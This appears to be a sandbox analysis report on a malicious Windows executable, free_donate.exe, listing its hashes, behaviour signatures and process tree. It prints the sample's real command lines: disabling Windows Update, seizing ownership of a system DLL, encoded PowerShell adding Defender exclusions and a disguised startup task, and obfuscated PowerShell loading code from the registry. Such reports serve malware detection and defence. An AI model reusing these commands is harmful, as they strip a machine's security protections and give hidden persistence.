Analysis
-
max time kernel
10s -
max time network
59s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
17-11-2022 21:41
Static task
static1
General
-
Target
free_donate.exe
-
Size
2.7MB
-
MD5
5026ed09cc5a093093461066d16a8f30
-
SHA1
34d60b874d9d3f8841c721692ea1daf31f330653
-
SHA256
b495d68b0733d071e67e0c30665382decd71885af9bad1c6510ef168e5732cd3
-
SHA512
2429b9d55af9abe991a182b5fe49548d31986046c3bbacaa4021dd7544752f9b2e0b5c494c989b58daafaaf604e863abe3bd013125068331538618140d67a1f1
-
SSDEEP
49152:HgJH+Kol630+0DW0TOWxKyuPcMPgBAnDEQ1o/40fyNHpElUZ7lPP:AJgl630pBTXVGhPYzQ1o//wElulH
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe -
Drops file in Drivers directory 1 IoCs
Processes:
free_donate.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts free_donate.exe -
Possible privilege escalation attempt 2 IoCs
Processes:
takeown.exeicacls.exepid process 2160 takeown.exe 3204 icacls.exe -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
free_donate.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation free_donate.exe -
Modifies file permissions 1 TTPs 2 IoCs
Processes:
takeown.exeicacls.exepid process 2160 takeown.exe 3204 icacls.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 23 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
Processes:
free_donate.exedescription pid process target process PID 780 set thread context of 3512 780 free_donate.exe conhost.exe -
Drops file in Windows directory 4 IoCs
Processes:
conhost.exedescription ioc process File created C:\Windows\Tasks\dialersvc32.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc32.job conhost.exe File created C:\Windows\Tasks\dialersvc64.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc64.job conhost.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid process 3396 sc.exe 4972 sc.exe 3640 sc.exe 4028 sc.exe 2436 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry key 1 TTPs 9 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 3132 reg.exe 2472 reg.exe 3804 reg.exe 2736 reg.exe 4612 reg.exe 1792 reg.exe 4544 reg.exe 1920 reg.exe 3740 reg.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exefree_donate.exepowershell.exepid process 4320 powershell.exe 4320 powershell.exe 780 free_donate.exe 428 powershell.exe -
Suspicious use of AdjustPrivilegeToken 12 IoCs
Processes:
powershell.exefree_donate.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exepowershell.exedescription pid process Token: SeDebugPrivilege 4320 powershell.exe Token: SeDebugPrivilege 780 free_donate.exe Token: SeShutdownPrivilege 4868 powercfg.exe Token: SeCreatePagefilePrivilege 4868 powercfg.exe Token: SeShutdownPrivilege 1036 powercfg.exe Token: SeCreatePagefilePrivilege 1036 powercfg.exe Token: SeShutdownPrivilege 32 powercfg.exe Token: SeCreatePagefilePrivilege 32 powercfg.exe Token: SeShutdownPrivilege 2352 powercfg.exe Token: SeCreatePagefilePrivilege 2352 powercfg.exe Token: SeTakeOwnershipPrivilege 2160 takeown.exe Token: SeDebugPrivilege 428 powershell.exe -
Suspicious use of WriteProcessMemory 51 IoCs
Processes:
free_donate.execmd.execmd.exedescription pid process target process PID 780 wrote to memory of 4320 780 free_donate.exe powershell.exe PID 780 wrote to memory of 4320 780 free_donate.exe powershell.exe PID 780 wrote to memory of 524 780 free_donate.exe cmd.exe PID 780 wrote to memory of 524 780 free_donate.exe cmd.exe PID 780 wrote to memory of 372 780 free_donate.exe cmd.exe PID 780 wrote to memory of 372 780 free_donate.exe cmd.exe PID 524 wrote to memory of 2436 524 cmd.exe sc.exe PID 524 wrote to memory of 2436 524 cmd.exe sc.exe PID 524 wrote to memory of 3396 524 cmd.exe sc.exe PID 524 wrote to memory of 3396 524 cmd.exe sc.exe PID 372 wrote to memory of 4868 372 cmd.exe powercfg.exe PID 372 wrote to memory of 4868 372 cmd.exe powercfg.exe PID 524 wrote to memory of 3640 524 cmd.exe sc.exe PID 524 wrote to memory of 3640 524 cmd.exe sc.exe PID 524 wrote to memory of 4972 524 cmd.exe sc.exe PID 524 wrote to memory of 4972 524 cmd.exe sc.exe PID 372 wrote to memory of 1036 372 cmd.exe powercfg.exe PID 372 wrote to memory of 1036 372 cmd.exe powercfg.exe PID 524 wrote to memory of 4028 524 cmd.exe sc.exe PID 524 wrote to memory of 4028 524 cmd.exe sc.exe PID 372 wrote to memory of 32 372 cmd.exe powercfg.exe PID 372 wrote to memory of 32 372 cmd.exe powercfg.exe PID 524 wrote to memory of 1920 524 cmd.exe reg.exe PID 524 wrote to memory of 1920 524 cmd.exe reg.exe PID 372 wrote to memory of 2352 372 cmd.exe powercfg.exe PID 372 wrote to memory of 2352 372 cmd.exe powercfg.exe PID 524 wrote to memory of 3740 524 cmd.exe reg.exe PID 524 wrote to memory of 3740 524 cmd.exe reg.exe PID 524 wrote to memory of 3804 524 cmd.exe reg.exe PID 524 wrote to memory of 3804 524 cmd.exe reg.exe PID 524 wrote to memory of 4612 524 cmd.exe reg.exe PID 524 wrote to memory of 4612 524 cmd.exe reg.exe PID 524 wrote to memory of 2736 524 cmd.exe reg.exe PID 524 wrote to memory of 2736 524 cmd.exe reg.exe PID 524 wrote to memory of 2160 524 cmd.exe takeown.exe PID 524 wrote to memory of 2160 524 cmd.exe takeown.exe PID 524 wrote to memory of 3204 524 cmd.exe icacls.exe PID 524 wrote to memory of 3204 524 cmd.exe icacls.exe PID 780 wrote to memory of 3512 780 free_donate.exe conhost.exe PID 780 wrote to memory of 3512 780 free_donate.exe conhost.exe PID 780 wrote to memory of 3512 780 free_donate.exe conhost.exe PID 780 wrote to memory of 3512 780 free_donate.exe conhost.exe PID 780 wrote to memory of 3512 780 free_donate.exe conhost.exe PID 780 wrote to memory of 3512 780 free_donate.exe conhost.exe PID 780 wrote to memory of 3512 780 free_donate.exe conhost.exe PID 780 wrote to memory of 3512 780 free_donate.exe conhost.exe PID 780 wrote to memory of 3512 780 free_donate.exe conhost.exe PID 780 wrote to memory of 3512 780 free_donate.exe conhost.exe PID 780 wrote to memory of 3512 780 free_donate.exe conhost.exe PID 780 wrote to memory of 428 780 free_donate.exe powershell.exe PID 780 wrote to memory of 428 780 free_donate.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\free_donate.exe"C:\Users\Admin\AppData\Local\Temp\free_donate.exe"1⤵
- Drops file in Drivers directory
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAZgBxACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdwBhAG0AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegB5AGQAaQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBpAHUAbAAjAD4A"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f3⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f3⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAYwB4AG4AIwA+ACAAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACcAcABvAHcAZQByAHMAaABlAGwAbAAnACAALQBBAHIAZwB1AG0AZQBuAHQAIAAnAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAIgBQAEEAQQBqAEEASABBAEEAZAB3AEEAagBBAEQANABBAEkAQQBCAFQAQQBIAFEAQQBZAFEAQgB5AEEASABRAEEATABRAEIAUQBBAEgASQBBAGIAdwBCAGoAQQBHAFUAQQBjAHcAQgB6AEEAQwBBAEEATABRAEIARwBBAEcAawBBAGIAQQBCAGwAQQBGAEEAQQBZAFEAQgAwAEEARwBnAEEASQBBAEEAbgBBAEUATQBBAE8AZwBCAGMAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAEkAQQBCAEcAQQBHAGsAQQBiAEEAQgBsAEEASABNAEEAWABBAEIASABBAEcAOABBAGIAdwBCAG4AQQBHAHcAQQBaAFEAQgBjAEEARQBNAEEAYQBBAEIAeQBBAEcAOABBAGIAUQBCAGwAQQBGAHcAQQBkAFEAQgB3AEEARwBRAEEAWQBRAEIAMABBAEcAVQBBAGMAZwBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEASQBBAEEAdABBAEYAWQBBAFoAUQBCAHkAQQBHAEkAQQBJAEEAQgBTAEEASABVAEEAYgBnAEIAQgBBAEgATQBBAEkAQQBBADgAQQBDAE0AQQBhAFEAQgAwAEEAQwBNAEEAUABnAEEAPQAiACcAKQAgADwAIwB6AHIAbABtACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAdwBzACMAPgAgAC0AUwBlAHQAdABpAG4AZwBzACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAaQBzAGEAbABsAG8AdwBIAGEAcgBkAFQAZQByAG0AaQBuAGEAdABlACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAbwBuAHQAUwB0AG8AcABPAG4ASQBkAGwAZQBFAG4AZAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AVABpAG0AZQBMAGkAbQBpAHQAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBEAGEAeQBzACAAMQAwADAAMAApACkAIAA8ACMAZQB1AHEAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwBpAGEAIwA+ADsAIABDAG8AcAB5AC0ASQB0AGUAbQAgACcAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABmAHIAZQBlAF8AZABvAG4AYQB0AGUALgBlAHgAZQAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAEYAbwByAGMAZQAgADwAIwBvAHUAIwA+ADsAIABTAHQAYQByAHQALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAAPAAjAGEAdgBhACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAOwA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{cb25963d-30eb-4752-8ef6-c1bd9fda8cb7}1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
memory/32-147-0x0000000000000000-mapping.dmp
-
memory/372-138-0x0000000000000000-mapping.dmp
-
memory/428-165-0x00007FFC3A920000-0x00007FFC3B3E1000-memory.dmpFilesize
10.8MB
-
memory/428-161-0x0000000000000000-mapping.dmp
-
memory/524-137-0x0000000000000000-mapping.dmp
-
memory/744-175-0x00000000044A0000-0x00000000044C2000-memory.dmpFilesize
136KB
-
memory/744-171-0x0000000004660000-0x0000000004C88000-memory.dmpFilesize
6.2MB
-
memory/744-169-0x0000000003EB0000-0x0000000003EE6000-memory.dmpFilesize
216KB
-
memory/744-176-0x0000000004D90000-0x0000000004DF6000-memory.dmpFilesize
408KB
-
memory/744-178-0x0000000004E00000-0x0000000004E66000-memory.dmpFilesize
408KB
-
memory/780-173-0x00007FFC3A920000-0x00007FFC3B3E1000-memory.dmpFilesize
10.8MB
-
memory/780-139-0x000000001C7D0000-0x000000001C7E2000-memory.dmpFilesize
72KB
-
memory/780-132-0x0000000000A10000-0x0000000000CC8000-memory.dmpFilesize
2.7MB
-
memory/780-133-0x00007FFC3A920000-0x00007FFC3B3E1000-memory.dmpFilesize
10.8MB
-
memory/924-172-0x0000000000000000-mapping.dmp
-
memory/1036-145-0x0000000000000000-mapping.dmp
-
memory/1692-189-0x00007FFC56DB0000-0x00007FFC56E6E000-memory.dmpFilesize
760KB
-
memory/1692-188-0x00007FFC58C90000-0x00007FFC58E85000-memory.dmpFilesize
2.0MB
-
memory/1692-180-0x00007FFC56DB0000-0x00007FFC56E6E000-memory.dmpFilesize
760KB
-
memory/1692-179-0x00007FFC58C90000-0x00007FFC58E85000-memory.dmpFilesize
2.0MB
-
memory/1692-174-0x00007FFC3A920000-0x00007FFC3B3E1000-memory.dmpFilesize
10.8MB
-
memory/1792-167-0x0000000000000000-mapping.dmp
-
memory/1876-170-0x0000000000000000-mapping.dmp
-
memory/1920-148-0x0000000000000000-mapping.dmp
-
memory/2160-154-0x0000000000000000-mapping.dmp
-
memory/2352-149-0x0000000000000000-mapping.dmp
-
memory/2436-140-0x0000000000000000-mapping.dmp
-
memory/2472-166-0x0000000000000000-mapping.dmp
-
memory/2736-153-0x0000000000000000-mapping.dmp
-
memory/3132-164-0x0000000000000000-mapping.dmp
-
memory/3204-155-0x0000000000000000-mapping.dmp
-
memory/3396-141-0x0000000000000000-mapping.dmp
-
memory/3432-177-0x0000000000000000-mapping.dmp
-
memory/3512-158-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/3512-156-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/3512-160-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/3512-159-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/3512-157-0x0000000140001844-mapping.dmp
-
memory/3640-143-0x0000000000000000-mapping.dmp
-
memory/3740-150-0x0000000000000000-mapping.dmp
-
memory/3804-151-0x0000000000000000-mapping.dmp
-
memory/4028-146-0x0000000000000000-mapping.dmp
-
memory/4200-190-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/4200-187-0x00007FFC56DB0000-0x00007FFC56E6E000-memory.dmpFilesize
760KB
-
memory/4200-186-0x00007FFC58C90000-0x00007FFC58E85000-memory.dmpFilesize
2.0MB
-
memory/4200-182-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/4200-183-0x00000001400033F4-mapping.dmp
-
memory/4200-184-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/4200-185-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/4320-135-0x000001EF78720000-0x000001EF78742000-memory.dmpFilesize
136KB
-
memory/4320-134-0x0000000000000000-mapping.dmp
-
memory/4320-136-0x00007FFC3A920000-0x00007FFC3B3E1000-memory.dmpFilesize
10.8MB
-
memory/4400-181-0x0000000000000000-mapping.dmp
-
memory/4544-168-0x0000000000000000-mapping.dmp
-
memory/4612-152-0x0000000000000000-mapping.dmp
-
memory/4868-142-0x0000000000000000-mapping.dmp
-
memory/4972-144-0x0000000000000000-mapping.dmp